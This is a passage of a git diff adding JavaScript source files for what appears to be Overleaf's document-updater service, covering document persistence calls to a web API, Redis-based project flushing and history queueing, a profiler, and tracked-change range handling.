+ }, + auth: { + user: Settings.apis.web.user, + pass: Settings.apis.web.pass, + sendImmediately: true, + }, + jar: false, + timeout: MAX_HTTP_REQUEST_LENGTH, + } + if (options.peek) { + requestParams.qs = { peek: 'true' } + } + request(requestParams, (error, res, body) => { + updateMetric('getDoc', error, res) + if (error) { + logger.error({ err: error, projectId, docId }, 'web API request failed') + return callback(new Error('error connecting to web API')) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + try { + body = JSON.parse(body) + } catch (e) { + return callback(e) + } + if (body.lines == null) { + return callback(new Error('web API response had no doc lines')) + } + if (body.version == null) { + return callback(new Error('web API response had no valid doc version')) + } + if (body.pathname == null) { + return callback(new Error('web API response had no valid doc pathname')) + } + if (!body.pathname) { + logger.warn( + { projectId, docId }, + 'missing pathname in PersistenceManager getDoc' + ) + Metrics.inc('pathname', 1, { + path: 'PersistenceManager.getDoc', + status: body.pathname === '' ? 'zero-length' : 'undefined', + }) + } + callback( + null, + body.lines, + body.version, + body.ranges, + body.pathname, + body.projectHistoryId?.toString(), + body.historyRangesSupport || false, + body.resolvedCommentIds || [] + ) + } else if (res.statusCode === 404) { + callback(new Errors.NotFoundError(`doc not not found: ${urlPath}`)) + } else if (res.statusCode === 413) { + callback( + new Errors.FileTooLargeError(`doc exceeds maximum size: ${urlPath}`) + ) + } else { + callback( + new Error(`error accessing web API: ${urlPath} ${res.statusCode}`) + ) + } + }) +} + +function setDoc( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy, + _callback +) { + const timer = new Metrics.Timer('persistenceManager.setDoc') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + const urlPath = `/project/${projectId}/doc/${docId}` + request( + { + url: `${Settings.apis.web.url}${urlPath}`, + method: 'POST', + json: { + lines, + ranges, + version, + lastUpdatedBy, + lastUpdatedAt, + }, + auth: { + user: Settings.apis.web.user, + pass: Settings.apis.web.pass, + sendImmediately: true, + }, + jar: false, + timeout: MAX_HTTP_REQUEST_LENGTH, + }, + (error, res, body) => { + updateMetric('setDoc', error, res) + if (error) { + logger.error({ err: error, projectId, docId }, 'web API request failed') + return callback(new Error('error connecting to web API')) + } + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, body) + } else if (res.statusCode === 404) { + callback(new Errors.NotFoundError(`doc not not found: ${urlPath}`)) + } else if (res.statusCode === 413) { + callback( + new Errors.FileTooLargeError(`doc exceeds maximum size: ${urlPath}`) + ) + } else { + callback( + new Error(`error accessing web API: ${urlPath} ${res.statusCode}`) + ) + } + } + ) +} + +module.exports = { + getDoc, + setDoc, + promises: { + getDoc: promisifyMultiResult(getDoc, [ + 'lines', + 'version', + 'ranges', + 'pathname', + 'projectHistoryId', + 'historyRangesSupport', + 'resolvedCommentIds', + ]), + setDoc: promisify(setDoc), + }, +} diff --git a/services/document-updater/app/js/Profiler.js b/services/document-updater/app/js/Profiler.js new file mode 100644 index 0000000..8daac4c --- /dev/null +++ b/services/document-updater/app/js/Profiler.js @@ -0,0 +1,68 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let Profiler +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +const deltaMs = function (ta, tb) { + const nanoSeconds = (ta[0] - tb[0]) * 1e9 + (ta[1] - tb[1]) + const milliSeconds = Math.floor(nanoSeconds * 1e-6) + return milliSeconds +} + +module.exports = Profiler = (function () { + Profiler = class Profiler { + static initClass() { + this.prototype.LOG_CUTOFF_TIME = 15 * 1000 + this.prototype.LOG_SYNC_CUTOFF_TIME = 1000 + } + + constructor(name, args) { + this.name = name + this.args = args + this.t0 = this.t = process.hrtime() + this.start = new Date() + this.updateTimes = [] + this.totalSyncTime = 0 + } + + log(label, options = {}) { + const t1 = process.hrtime() + const dtMilliSec = deltaMs(t1, this.t) + this.t = t1 + this.totalSyncTime += options.sync ? dtMilliSec : 0 + this.updateTimes.push([label, dtMilliSec]) // timings in ms + return this // make it chainable + } + + end(message) { + const totalTime = deltaMs(this.t, this.t0) + const exceedsCutoff = totalTime > this.LOG_CUTOFF_TIME + const exceedsSyncCutoff = this.totalSyncTime > this.LOG_SYNC_CUTOFF_TIME + if (exceedsCutoff || exceedsSyncCutoff) { + // log anything greater than cutoffs + const args = {} + for (const k in this.args) { + const v = this.args[k] + args[k] = v + } + args.updateTimes = this.updateTimes + args.start = this.start + args.end = new Date() + args.status = { exceedsCutoff, exceedsSyncCutoff } + logger.warn(args, this.name) + } + return totalTime + } + } + Profiler.initClass() + return Profiler +})() diff --git a/services/document-updater/app/js/ProjectFlusher.js b/services/document-updater/app/js/ProjectFlusher.js new file mode 100644 index 0000000..33d585b --- /dev/null +++ b/services/document-updater/app/js/ProjectFlusher.js @@ -0,0 +1,139 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const request = require('request') +const Settings = require('@overleaf/settings') +const RedisManager = require('./RedisManager') +const { rclient } = RedisManager +const docUpdaterKeys = Settings.redis.documentupdater.key_schema +const async = require('async') +const ProjectManager = require('./ProjectManager') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') + +const ProjectFlusher = { + // iterate over keys asynchronously using redis scan (non-blocking) + // handle all the cluster nodes or single redis server + _getKeys(pattern, limit, callback) { + const nodes = (typeof rclient.nodes === 'function' + ? rclient.nodes('master') + : undefined) || [rclient] + const doKeyLookupForNode = (node, cb) => + ProjectFlusher._getKeysFromNode(node, pattern, limit, cb) + return async.concatSeries(nodes, doKeyLookupForNode, callback) + }, + + _getKeysFromNode(node, pattern, limit, callback) { + if (limit == null) { + limit = 1000 + } + let cursor = 0 // redis iterator + const keySet = {} // use hash to avoid duplicate results + const batchSize = limit != null ? Math.min(limit, 1000) : 1000 + // scan over all keys looking for pattern + const doIteration = ( + cb // avoid hitting redis too hard + ) => + node.scan( + cursor, + 'MATCH', + pattern, + 'COUNT', + batchSize, + function (error, reply) { + let keys + if (error != null) { + return callback(error) + } + ;[cursor, keys] = Array.from(reply) + for (const key of Array.from(keys)) { + keySet[key] = true + } + keys = Object.keys(keySet) + const noResults = cursor === '0' // redis returns string results not numeric + const limitReached = limit != null && keys.length >= limit + if (noResults || limitReached) { + return callback(null, keys) + } else { + return setTimeout(doIteration, 10) + } + } + ) + return doIteration() + }, + + // extract ids from keys like DocsWithHistoryOps:57fd0b1f53a8396d22b2c24b + // or docsInProject:{57fd0b1f53a8396d22b2c24b} (for redis cluster) + _extractIds(keyList) { + const ids = (() => { + const result = [] + for (const key of Array.from(keyList)) { + const m = key.match(/:\{?([0-9a-f]{24})\}?/) // extract object id + result.push(m[1]) + } + return result + })() + return ids + }, + + flushAllProjects(options, callback) { + logger.info({ options }, 'flushing all projects') + return ProjectFlusher._getKeys( + docUpdaterKeys.docsInProject({ project_id: '*' }), + options.limit, + function (error, projectKeys) { + if (error != null) { + logger.err({ err: error }, 'error getting keys for flushing') + return callback(error) + } + const projectIds = ProjectFlusher._extractIds(projectKeys) + if (options.dryRun) { + return callback(null, projectIds) + } + const jobs = _.map( + projectIds, + projectId => cb => + ProjectManager.flushAndDeleteProjectWithLocks( + projectId, + { background: true }, + cb + ) + ) + return async.parallelLimit( + async.reflectAll(jobs), + options.concurrency, + function (error, results) { + const success = [] + const failure = [] + _.each(results, function (result, i) { + if (result.error != null) { + return failure.push(projectIds[i]) + } else { + return success.push(projectIds[i]) + } + }) + logger.info( + { successCount: success.length, failureCount: failure.length }, + 'finished flushing all projects' + ) + return callback(error, { success, failure }) + } + ) + } + ) + }, +} + +module.exports = ProjectFlusher +module.exports.promises = promisifyAll(ProjectFlusher) diff --git a/services/document-updater/app/js/ProjectHistoryRedisManager.js b/services/document-updater/app/js/ProjectHistoryRedisManager.js new file mode 100644 index 0000000..9a9985d --- /dev/null +++ b/services/document-updater/app/js/ProjectHistoryRedisManager.js @@ -0,0 +1,245 @@ +// @ts-check + +const Settings = require('@overleaf/settings') +const { callbackifyAll } = require('@overleaf/promise-utils') +const projectHistoryKeys = Settings.redis?.project_history?.key_schema +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const logger = require('@overleaf/logger') +const metrics = require('./Metrics') +const { docIsTooLarge } = require('./Limits') +const { addTrackedDeletesToContent, extractOriginOrSource } = require('./Utils') +const HistoryConversions = require('./HistoryConversions') +const OError = require('@overleaf/o-error') + +/** + * @import { Ranges } from './types' + */ + +const ProjectHistoryRedisManager = { + async queueOps(projectId, ...ops) { + // Record metric for ops pushed onto queue + for (const op of ops) { + metrics.summary('redis.projectHistoryOps', op.length, { status: 'push' }) + } + + // Make sure that this MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + // Push the ops onto the project history queue + multi.rpush( + projectHistoryKeys.projectHistoryOps({ project_id: projectId }), + ...ops + ) + // To record the age of the oldest op on the queue set a timestamp if not + // already present (SETNX). + multi.setnx( + projectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: projectId, + }), + Date.now() + ) + const result = await multi.exec() + return result[0] + }, + + async queueRenameEntity( + projectId, + projectHistoryId, + entityType, + entityId, + userId, + projectUpdate, + originOrSource + ) { + projectUpdate = { + pathname: projectUpdate.pathname, + new_pathname: projectUpdate.newPathname, + meta: { + user_id: userId, + ts: new Date(), + }, + version: projectUpdate.version, + projectHistoryId, + } + projectUpdate[entityType] = entityId + + const { origin, source } = extractOriginOrSource(originOrSource) + + if (origin != null) { + projectUpdate.meta.origin = origin + if (origin.kind !== 'editor') { + projectUpdate.meta.type = 'external' + } + } else if (source != null) { + projectUpdate.meta.source = source + if (source !== 'editor') { + projectUpdate.meta.type = 'external' + } + } + + logger.debug( + { projectId, projectUpdate }, + 'queue rename operation to project-history' + ) + const jsonUpdate = JSON.stringify(projectUpdate) + + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + async queueAddEntity( + projectId, + projectHistoryId, + entityType, + entityId, + userId, + projectUpdate, + originOrSource + ) { + let docLines = projectUpdate.docLines + let ranges + if (projectUpdate.historyRangesSupport && projectUpdate.ranges) { + docLines = addTrackedDeletesToContent( + docLines, + projectUpdate.ranges.changes ?? [] + ) + ranges = HistoryConversions.toHistoryRanges(projectUpdate.ranges) + } + + projectUpdate = { + pathname: projectUpdate.pathname, + docLines, + url: projectUpdate.url, + meta: { + user_id: userId, + ts: new Date(), + }, + version: projectUpdate.version, + hash: projectUpdate.hash, + metadata: projectUpdate.metadata, + projectHistoryId, + createdBlob: projectUpdate.createdBlob ?? false, + } + if (ranges) { + projectUpdate.ranges = ranges + } + projectUpdate[entityType] = entityId + + const { origin, source } = extractOriginOrSource(originOrSource) + + if (origin != null) { + projectUpdate.meta.origin = origin + if (origin.kind !== 'editor') { + projectUpdate.meta.type = 'external' + } + } else if (source != null) { + projectUpdate.meta.source = source + if (source !== 'editor') { + projectUpdate.meta.type = 'external' + } + } + + logger.debug( + { projectId, projectUpdate }, + 'queue add operation to project-history' + ) + const jsonUpdate = JSON.stringify(projectUpdate) + + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + async queueResyncProjectStructure( + projectId, + projectHistoryId, + docs, + files, + opts + ) { + logger.debug({ projectId, docs, files }, 'queue project structure resync') + const projectUpdate = { + resyncProjectStructure: { docs, files }, + projectHistoryId, + meta: { + ts: new Date(), + }, + } + if (opts.resyncProjectStructureOnly) { + projectUpdate.resyncProjectStructureOnly = opts.resyncProjectStructureOnly + } + const jsonUpdate = JSON.stringify(projectUpdate) + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + /** + * Add a resync doc update to the project-history queue + * + * @param {string} projectId + * @param {string} projectHistoryId + * @param {string} docId + * @param {string[]} lines + * @param {Ranges} ranges + * @param {string[]} resolvedCommentIds + * @param {number} version + * @param {string} pathname + * @param {boolean} historyRangesSupport + * @return {Promise<number>} the number of ops added + */ + async queueResyncDocContent( + projectId, + projectHistoryId, + docId, + lines, + ranges, + resolvedCommentIds, + version, + pathname, + historyRangesSupport + ) { + logger.debug( + { projectId, docId, lines, version, pathname }, + 'queue doc content resync' + ) + + let content = lines.join('\n') + if (historyRangesSupport) { + content = addTrackedDeletesToContent(content, ranges.changes ?? []) + } + + const projectUpdate = { + resyncDocContent: { content, version }, + projectHistoryId, + path: pathname, + doc: docId, + meta: { + ts: new Date(), + }, + } + + if (historyRangesSupport) { + projectUpdate.resyncDocContent.ranges = + HistoryConversions.toHistoryRanges(ranges) + projectUpdate.resyncDocContent.resolvedCommentIds = resolvedCommentIds + } + + const jsonUpdate = JSON.stringify(projectUpdate) + // Do an optimised size check on the docLines using the serialised + // project update length as an upper bound + const sizeBound = jsonUpdate.length + if (docIsTooLarge(sizeBound, lines, Settings.max_doc_length)) { + throw new OError( + 'blocking resync doc content insert into project history queue: doc is too large', + { projectId, docId, docSize: sizeBound } + ) + } + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, +} + +module.exports = { + ...callbackifyAll(ProjectHistoryRedisManager), + promises: ProjectHistoryRedisManager, +} diff --git a/services/document-updater/app/js/ProjectManager.js b/services/document-updater/app/js/ProjectManager.js new file mode 100644 index 0000000..781ed0e --- /dev/null +++ b/services/document-updater/app/js/ProjectManager.js @@ -0,0 +1,341 @@ +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const DocumentManager = require('./DocumentManager') +const HistoryManager = require('./HistoryManager') +const async = require('async') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const Errors = require('./Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +function flushProjectWithLocks(projectId, _callback) { + const timer = new Metrics.Timer('projectManager.flushProjectWithLocks') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + const errors = [] + const jobs = docIds.map(docId => callback => { + DocumentManager.flushDocIfLoadedWithLock(projectId, docId, error => { + if (error instanceof Errors.NotFoundError) { + logger.warn( + { err: error, projectId, docId }, + 'found deleted doc when flushing' + ) + callback() + } else if (error) { + logger.error({ err: error, projectId, docId }, 'error flushing doc') + errors.push(error) + callback() + } else { + callback() + } + }) + }) + + logger.debug({ projectId, docIds }, 'flushing docs') + async.series(jobs, () => { + if (errors.length > 0) { + callback(new Error('Errors flushing docs. See log for details')) + } else { + callback(null) + } + }) + }) +} + +function flushAndDeleteProjectWithLocks(projectId, options, _callback) { + const timer = new Metrics.Timer( + 'projectManager.flushAndDeleteProjectWithLocks' + ) + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + const errors = [] + const jobs = docIds.map(docId => callback => { + DocumentManager.flushAndDeleteDocWithLock(projectId, docId, {}, error => { + if (error) { + logger.error({ err: error, projectId, docId }, 'error deleting doc') + errors.push(error) + } + callback() + }) + }) + + logger.debug({ projectId, docIds }, 'deleting docs') + async.series(jobs, () => + // When deleting the project here we want to ensure that project + // history is completely flushed because the project may be + // deleted in web after this call completes, and so further + // attempts to flush would fail after that. + HistoryManager.flushProjectChanges(projectId, options, error => { + if (errors.length > 0) { + callback(new Error('Errors deleting docs. See log for details')) + } else if (error) { + callback(error) + } else { + callback(null) + } + }) + ) + }) +} + +function queueFlushAndDeleteProject(projectId, callback) { + RedisManager.queueFlushAndDeleteProject(projectId, error => { + if (error) { + logger.error( + { projectId, error }, + 'error adding project to flush and delete queue' + ) + return callback(error) + } + Metrics.inc('queued-delete') + callback() + }) +} + +function getProjectDocsTimestamps(projectId, callback) { + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + if (docIds.length === 0) { + return callback(null, []) + } + RedisManager.getDocTimestamps(docIds, (error, timestamps) => { + if (error) { + return callback(error) + } + callback(null, timestamps) + }) + }) +} + +function getProjectDocsAndFlushIfOld( + projectId, + projectStateHash, + excludeVersions, + _callback +) { + const timer = new Metrics.Timer('projectManager.getProjectDocsAndFlushIfOld') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.checkOrSetProjectState( + projectId, + projectStateHash, + (error, projectStateChanged) => { + if (error) { + logger.error( + { err: error, projectId }, + 'error getting/setting project state in getProjectDocsAndFlushIfOld' + ) + return callback(error) + } + // we can't return docs if project structure has changed + if (projectStateChanged) { + return callback( + new Errors.ProjectStateChangedError('project state changed') + ) + } + // project structure hasn't changed, return doc content from redis + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + logger.error( + { err: error, projectId }, + 'error getting doc ids in getProjectDocs' + ) + return callback(error) + } + // get the doc lines from redis + const jobs = docIds.map(docId => cb => { + DocumentManager.getDocAndFlushIfOldWithLock( + projectId, + docId, + (err, lines, version) => { + if (err) { + logger.error( + { err, projectId, docId }, + 'error getting project doc lines in getProjectDocsAndFlushIfOld' + ) + return cb(err) + } + const doc = { _id: docId, lines, v: version } // create a doc object to return + cb(null, doc) + } + ) + }) + async.series(jobs, (error, docs) => { + if (error) { + return callback(error) + } + callback(null, docs) + }) + }) + } + ) +} + +function clearProjectState(projectId, callback) { + RedisManager.clearProjectState(projectId, callback) +} + +function updateProjectWithLocks( + projectId, + projectHistoryId, + userId, + updates, + projectVersion, + source, + _callback +) { + const timer = new Metrics.Timer('projectManager.updateProject') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + let projectSubversion = 0 // project versions can have multiple operations + let projectOpsLength = 0 + + function handleUpdate(update, cb) { + update.version = `${projectVersion}.${projectSubversion++}` + switch (update.type) { + case 'add-doc': + ProjectHistoryRedisManager.queueAddEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + case 'rename-doc': + if (!update.newPathname) { + // an empty newPathname signifies a delete, so there is no need to + // update the pathname in redis + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + } else { + // rename the doc in redis before queuing the update + DocumentManager.renameDocWithLock( + projectId, + update.id, + userId, + update, + projectHistoryId, + error => { + if (error) { + return cb(error) + } + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + } + ) + } + break + case 'add-file': + ProjectHistoryRedisManager.queueAddEntity( + projectId, + projectHistoryId, + 'file', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + case 'rename-file': + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'file', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + default: + cb(new Error(`Unknown update type: ${update.type}`)) + } + } + + async.eachSeries(updates, handleUpdate, error => { + if (error) { + return callback(error) + } + if ( + HistoryManager.shouldFlushHistoryOps( + projectOpsLength, + updates.length, + HistoryManager.FLUSH_PROJECT_EVERY_N_OPS + ) + ) { + HistoryManager.flushProjectChangesAsync(projectId) + } + callback() + }) +} + +module.exports = { + flushProjectWithLocks, + flushAndDeleteProjectWithLocks, + queueFlushAndDeleteProject, + getProjectDocsTimestamps, + getProjectDocsAndFlushIfOld, + clearProjectState, + updateProjectWithLocks, +} + +module.exports.promises = promisifyAll(module.exports) diff --git a/services/document-updater/app/js/RangesManager.js b/services/document-updater/app/js/RangesManager.js new file mode 100644 index 0000000..c146afd --- /dev/null +++ b/services/document-updater/app/js/RangesManager.js @@ -0,0 +1,577 @@ +// @ts-check + +const RangesTracker = require('@overleaf/ranges-tracker') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Metrics = require('./Metrics') +const _ = require('lodash') +const { isInsert, isDelete, isComment, getDocLength } = require('./Utils') + +/** + * @import { Comment, CommentOp, InsertOp, DeleteOp, HistoryOp, Op } from './types' + * @import { HistoryCommentOp, HistoryDeleteOp, HistoryInsertOp, HistoryRetainOp } from './types' + * @import { HistoryDeleteTrackedChange, HistoryUpdate, Ranges, TrackedChange, Update } from './types' + */ + +const RANGE_DELTA_BUCKETS = [0, 1, 2, 3, 4, 5, 10, 20, 50] + +const RangesManager = { + MAX_COMMENTS: 500, + MAX_CHANGES: 2000, + + /** + * Apply an update to the given doc (lines and ranges) and return new ranges + * + * @param {string} projectId + * @param {string} docId + * @param {Ranges} ranges - ranges before the updates were applied + * @param {Update[]} updates + * @param {string[]} newDocLines - the document lines after the updates were applied + * @param {object} opts + * @param {boolean} [opts.historyRangesSupport] - whether history ranges support is enabled + * @returns {{ newRanges: Ranges, rangesWereCollapsed: boolean, historyUpdates: HistoryUpdate[] }} + */ + applyUpdate(projectId, docId, ranges, updates, newDocLines, opts = {}) { + if (ranges == null) { + ranges = {} + } + if (updates == null) { + updates = [] + } + const { changes, comments } = _.cloneDeep(ranges) + const rangesTracker = new RangesTracker(changes, comments) + const [emptyRangeCountBefore, totalRangeCountBefore] = + RangesManager._emptyRangesCount(rangesTracker) + const historyUpdates = [] + for (const update of updates) { + const trackingChanges = Boolean(update.meta?.tc) + rangesTracker.track_changes = trackingChanges + if (update.meta?.tc) { + rangesTracker.setIdSeed(update.meta.tc) + } + const historyOps = [] + for (const op of update.op) { + let croppedCommentOps = [] + if (opts.historyRangesSupport) { + historyOps.push( + getHistoryOp(op, rangesTracker.comments, rangesTracker.changes) + ) + if (isDelete(op) && trackingChanges) { + // If a tracked delete overlaps a comment, the comment must be + // cropped. The extent of the cropping is calculated before the + // delete is applied, but the cropping operations are applied + // later, after the delete is applied. + croppedCommentOps = getCroppedCommentOps(op, rangesTracker.comments) + } + } else if (isInsert(op) || isDelete(op)) { + historyOps.push(op) + } + rangesTracker.applyOp(op, { user_id: update.meta?.user_id }) + if (croppedCommentOps.length > 0) { + historyOps.push( + ...croppedCommentOps.map(op => + getHistoryOpForComment(op, rangesTracker.changes) + ) + ) + } + } + if (historyOps.length > 0) { + historyUpdates.push({ ...update, op: historyOps }) + } + } + + if ( + rangesTracker.changes?.length > RangesManager.MAX_CHANGES || + rangesTracker.comments?.length > RangesManager.MAX_COMMENTS + ) { + throw new Error('too many comments or tracked changes') + } + + try { + // This is a consistency check that all of our ranges and + // comments still match the corresponding text + rangesTracker.validate(newDocLines.join('\n')) + } catch (err) { + logger.error( + { err, projectId, docId, newDocLines, updates }, + 'error validating ranges' + ) + throw err + } + + const [emptyRangeCountAfter, totalRangeCountAfter] = + RangesManager._emptyRangesCount(rangesTracker) + const rangesWereCollapsed = + emptyRangeCountAfter > emptyRangeCountBefore || + totalRangeCountAfter + 1 < totalRangeCountBefore // also include the case where multiple ranges were removed + // monitor the change in range count, we may want to snapshot before large decreases + if (totalRangeCountAfter < totalRangeCountBefore) { + Metrics.histogram( + 'range-delta', + totalRangeCountBefore - totalRangeCountAfter, + RANGE_DELTA_BUCKETS, + { status_code: rangesWereCollapsed ? 'saved' : 'unsaved' } + ) + } + const newRanges = RangesManager._getRanges(rangesTracker) + logger.debug( + { + projectId, + docId, + changesCount: newRanges.changes?.length, + commentsCount: newRanges.comments?.length, + rangesWereCollapsed, + }, + 'applied updates to ranges' + ) + return { newRanges, rangesWereCollapsed, historyUpdates } + }, + + acceptChanges(projectId, docId, changeIds, ranges, lines) { + const { changes, comments } = ranges + logger.debug(`accepting ${changeIds.length} changes in ranges`) + const rangesTracker = new RangesTracker(changes, comments) + rangesTracker.removeChangeIds(changeIds) + const newRanges = RangesManager._getRanges(rangesTracker) + return newRanges + }, + + deleteComment(commentId, ranges) { + const { changes, comments } = ranges + logger.debug({ commentId }, 'deleting comment in ranges') + const rangesTracker = new RangesTracker(changes, comments) + rangesTracker.removeCommentId(commentId) + const newRanges = RangesManager._getRanges(rangesTracker) + return newRanges + }, + + /** + * + * @param {object} args + * @param {string} args.docId + * @param {string[]} args.acceptedChangeIds + * @param {TrackedChange[]} args.changes + * @param {string} args.pathname + * @param {string} args.projectHistoryId + * @param {string[]} args.lines + */ + getHistoryUpdatesForAcceptedChanges({ + docId, + acceptedChangeIds, + changes, + pathname, + projectHistoryId, + lines, + }) { + /** @type {(change: TrackedChange) => boolean} */ + const isAccepted = change => acceptedChangeIds.includes(change.id) + + const historyOps = [] + + // Keep ops in order of offset, with deletes before inserts + const sortedChanges = changes.slice().sort(function (c1, c2) { + const result = c1.op.p - c2.op.p + if (result !== 0) { + return result + } else if (isInsert(c1.op) && isDelete(c2.op)) { + return 1 + } else if (isDelete(c1.op) && isInsert(c2.op)) { + return -1 + } else { + return 0 + } + }) + + const docLength = getDocLength(lines) + let historyDocLength = docLength + for (const change of sortedChanges) { + if (isDelete(change.op)) { + historyDocLength += change.op.d.length + } + } + + let unacceptedDeletes = 0 + for (const change of sortedChanges) { + /** @type {HistoryOp | undefined} */ + let op + + if (isDelete(change.op)) { + if (isAccepted(change)) { + op = { + p: change.op.p, + d: change.op.d, + } + if (unacceptedDeletes > 0) { + op.hpos = op.p + unacceptedDeletes + } + } else { + unacceptedDeletes += change.op.d.length + } + } else if (isInsert(change.op)) { + if (isAccepted(change)) { + op = { + p: change.op.p, + r: change.op.i, + tracking: { type: 'none' }, + } + if (unacceptedDeletes > 0) { + op.hpos = op.p + unacceptedDeletes + } + } + } + + if (!op) { + continue + } + + /** @type {HistoryUpdate} */ + const historyOp = { + doc: docId, + op: [op], + meta: { + ...change.metadata, + ts: Date.now(), + doc_length: docLength, + pathname, + }, + } + + if (projectHistoryId) { + historyOp.projectHistoryId = projectHistoryId + } + + if (historyOp.meta && historyDocLength !== docLength) { + historyOp.meta.history_doc_length = historyDocLength + } + + historyOps.push(historyOp) + + if (isDelete(change.op) && isAccepted(change)) { + historyDocLength -= change.op.d.length + } + } + + return historyOps + }, + + _getRanges(rangesTracker) { + // Return the minimal data structure needed, since most documents won't have any + // changes or comments + + const response = {} + if (rangesTracker.changes != null && rangesTracker.changes.length > 0) { + response.changes = rangesTracker.changes + } + if (rangesTracker.comments != null && rangesTracker.comments.length > 0) { + response.comments = rangesTracker.comments + } + return response + }, + + _emptyRangesCount(ranges) { + let emptyCount = 0 + let totalCount = 0 + for (const comment of ranges.comments || []) { + totalCount++ + if (comment.op.c === '') { + emptyCount++ + } + } + for (const change of ranges.changes || []) { + totalCount++ + if (change.op.i != null) { + if (change.op.i === '') { + emptyCount++ + } + } + } + return [emptyCount, totalCount] + }, +} + +/** + * Calculate ops to be sent to the history system. + * + * @param {Op} op - the editor op + * @param {TrackedChange[]} changes - the list of tracked changes in the + * document before the op is applied. That list, coming from + * RangesTracker is ordered by position. + * @returns {HistoryOp} + */ +function getHistoryOp(op, comments, changes, opts = {}) { + if (isInsert(op)) { + return getHistoryOpForInsert(op, comments, changes) + } else if (isDelete(op)) { + return getHistoryOpForDelete(op, changes) + } else if (isComment(op)) { + return getHistoryOpForComment(op, changes) + } else { + throw new OError('Unrecognized op', { op }) + } +} + +/** + * Calculate history ops for an insert + * + * Inserts are moved forward by tracked deletes placed strictly before the + * op. When an insert is made at the same position as a tracked delete, the + * insert is placed before the tracked delete. + * + * We also add a commentIds property when inserts are made inside a comment. + * The current behaviour is to include the insert in the comment only if the + * insert is made strictly inside the comment. Inserts made at the edges are + * not included in the comment. + * + * @param {InsertOp} op + * @param {Comment[]} comments + * @param {TrackedChange[]} changes + * @returns {HistoryInsertOp} + */ +function getHistoryOpForInsert(op, comments, changes) { + let hpos = op.p + let trackedDeleteRejection = false + const commentIds = new Set() + + for (const comment of comments) { + if (comment.op.p < op.p && op.p < comment.op.p + comment.op.c.length) { + // Insert is inside the comment; add the comment id + commentIds.add(comment.op.t) + } + } + + // If it's determined that the op is a tracked delete rejection, we have to + // calculate its proper history position. If multiple tracked deletes are + // found at the same position as the insert, the tracked deletes that come + // before the tracked delete that was actually rejected offset the history + // position. + let trackedDeleteRejectionOffset = 0 + for (const change of changes) { + if (!isDelete(change.op)) { + // We're only interested in tracked deletes + continue + } + + if (change.op.p < op.p) { + // Tracked delete is before the op. Move the op forward. + hpos += change.op.d.length + } else if (change.op.p === op.p) { + // Tracked delete is at the same position as the op. + if (op.u && change.op.d.startsWith(op.i)) { + // We're undoing and the insert matches the start of the tracked + // delete. RangesManager treats this as a tracked delete rejection. We + // will note this in the op so that project-history can take the + // appropriate action. + trackedDeleteRejection = true + + // The history must be updated to take into account all preceding + // tracked deletes at the same position + hpos += trackedDeleteRejectionOffset + + // No need to continue. All subsequent tracked deletes are after the + // insert. + break + } else { + // This tracked delete does not match the insert. Note its length in + // case we find a tracked delete that matches later. + trackedDeleteRejectionOffset += change.op.d.length + } + } else { + // Tracked delete is after the insert. Tracked deletes are ordered, so + // we know that all subsequent tracked deletes will be after the insert + // and we can bail out. + break + } + } + + /** @type {HistoryInsertOp} */ + const historyOp = { ...op } + if (commentIds.size > 0) { + historyOp.commentIds = Array.from(commentIds) + } + if (hpos !== op.p) { + historyOp.hpos = hpos + } + if (trackedDeleteRejection) { + historyOp.trackedDeleteRejection = true + } + return historyOp +} + +/** + * Calculate history op for a delete + * + 